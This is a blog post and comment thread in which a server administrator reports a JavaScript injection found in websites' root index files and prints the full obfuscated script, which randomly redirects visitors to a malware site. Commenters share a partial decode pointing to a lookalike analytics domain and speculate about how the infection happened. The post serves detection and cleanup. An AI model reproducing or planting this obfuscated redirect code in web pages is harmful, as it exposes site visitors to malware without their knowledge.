Posted by & filed under Internet Information Server, Windows / Server.

Below is the javascript code of an “injection” that inserts itself into the index file of a website. It is designed to go undetected by only redirecting seldomly and randomly. It is placed at the bottom of the source code, with a significant gap in whitespace after the end of the regular source code (115 lines in all cases). In most of the cases that I have come across, it redirects to a “spyware” or “virus” site. It also goes undetected by antivirus programs (Trend Micro, Panda, Avast). It works with Mozilla (2.0.0.11) and IE7 (haven’t tested it in others). I’ll look into it further once I decode the script itself.

One of the sites it redirects to is: http://e.pepato.org/e/adsr.php?t=0

It infects each individual .php file and does not re-infect after the initial infection. I have created new sites and cleaned infected .php files and it has disappeared completely. It injects this code into .php (and .html) files about 115 lines below the end line. It ONLY infects index.php/html files in the root directory of the website. If you name your file: index2.php – it will not be infected. The “modified date” time stamps DO change with the infection. There was a spread of 1 minute for hundreds of .php files. If you need a quick way to search all index.php/html files on a server, download notepad++ and use the “search in directory” feature for certain strings of text. Alternatively, once you find the time stamp of infection, search for files modified at that time.

var mf=" shapgvba ejtf(c){ine ro,con=\"HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&amp;IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro&lt;c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu&gt;-1){ n=((nnu+1)%81-1);vs(n&lt;=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg&lt;mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd&gt;64 &amp;&amp; fbd&lt;78)||(fbd&gt;96 &amp;&amp; fbd&lt;110)) fbd=fbd+13;else if((fbd&gt;77 &amp;&amp; fbd&lt;91)||(fbd&gt;109 &amp;&amp; fbd&lt;123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="&lt;A~Msi$U7#]FT#FGla&amp;#B#A~Msi$a&gt;U!c~T\"G]$K;Ms$G’Ua&lt;SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&amp;A?az!c~T\"G]$KMG=GMMGMza\\a&gt;&lt;<a>\\/SeRJ:1&gt;aUmxU&lt;/A~Msi$&gt;U</a>"; rwgs(km);

Looks like a newer one, I’ve heard reports of similar activity as far back as mid January.

(No Ratings Yet)

6 Responses to “Javascript Spyware Redirect for IIS 6 (malware)”

  1. Thomas Johnson

    Do you know how this injection occurred? It happened to my websites and not sure how this code was added to the index files??

    Reply
  2. Chris Stinson

    I have not traced it back to the injection just yet. I’ll be starting off by looking at the log files of IIS and the Event viewer at the time of injection.

    What other applications did you have on your server? How many websites in IIS? Do you browse the Internet with IE 6 or IE 7 on that server? Do you have any ports open for other applications (like Exchange). Is your server using Windows Firewall?

    Reply
  3. Thomas Johnson

    someone decoded this script – i’m not sure if it’s accurate – but this is what they got:

    document.write( “” );

    http://www.google-analytlcs.com/__utt.js?

    document.writeln(“”);

    About your questions – i’m unsure about the server config – i will have to ask the hosting company – which is looking into it on thier end (i will post what they find here for you) – i was just alarmed that this code was added to my index.htm/html/php without my knowledge.
    i’m using IE 7 to browse
    server running
    Operating system Linux
    Kernel version 2.6.24.3-grsec
    Machine Type i686
    Apache version 1.3.37 (Unix)
    PERL version 5.8.8
    PHP version 4.4.4
    MySQL version 4.1.22-standard
    cPanel Build 11.18.3-STABLE 21703

    Reply
  4. Chris Stinson

    Yeah, it was an IFRAME injection done by the RBN (Russian Business Network).

    Your server configuration is different enough from the others that have been attacked. It looks to be an input validation injection. Possibly an upcoming bug in MySQL or PHP.

    I’ll have more time after I’m done with my ‘work’ for the day.

    Reply
  5. gv

    I googled but did not find how this insertion occurred. It happened to my websites and not sure which malware added this code to the index files.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>